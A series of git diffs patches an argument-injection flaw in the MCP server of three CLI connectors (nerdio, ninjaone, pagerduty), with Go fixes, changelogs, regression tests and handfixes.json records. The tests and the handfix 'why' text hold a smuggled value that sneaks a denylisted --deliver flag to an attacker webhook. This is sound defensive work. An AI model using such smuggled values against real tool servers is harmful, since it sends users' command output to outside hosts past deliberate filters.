--- a/skills/nerdio/CHANGELOG.md
+++ b/skills/nerdio/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.4]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.3] - 2026-09-01
 
 ### Added

--- a/skills/nerdio/CHANGELOG.md
+++ b/skills/nerdio/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.3] - 2026-09-01
 

--- a/skills/nerdio/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/nerdio/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/nerdio/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/nerdio/cli/internal/mcp/cobratree/shellout.go
@@ -201,6 +201,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -210,10 +217,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -221,11 +228,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/nerdio/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/nerdio/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/nerdio/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/nerdio/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/nerdio/handfixes.json
+++ b/skills/nerdio/handfixes.json
@@ -358,8 +358,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -369,7 +381,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/nerdio/handfixes.json
+++ b/skills/nerdio/handfixes.json
@@ -343,6 +343,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/ninjaone/CHANGELOG.md
+++ b/skills/ninjaone/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.13] - 2026-09-01
 

--- a/skills/ninjaone/CHANGELOG.md
+++ b/skills/ninjaone/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.14]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.13] - 2026-09-01
 
 ### Added

--- a/skills/ninjaone/CHANGELOG.md
+++ b/skills/ninjaone/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.13] - 2026-09-01

--- a/skills/ninjaone/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/ninjaone/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/ninjaone/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/ninjaone/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/ninjaone/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/ninjaone/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/ninjaone/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/ninjaone/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/ninjaone/handfixes.json
+++ b/skills/ninjaone/handfixes.json
@@ -505,6 +505,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/ninjaone/handfixes.json
+++ b/skills/ninjaone/handfixes.json
@@ -520,8 +520,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -531,7 +543,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/pagerduty/CHANGELOG.md
+++ b/skills/pagerduty/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26
 

--- a/skills/pagerduty/CHANGELOG.md
+++ b/skills/pagerduty/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26

--- a/skills/pagerduty/CHANGELOG.md
+++ b/skills/pagerduty/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.3]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.2] - 2026-08-26
 
 ### Fixed

--- a/skills/pagerduty/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/pagerduty/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/pagerduty/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/pagerduty/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
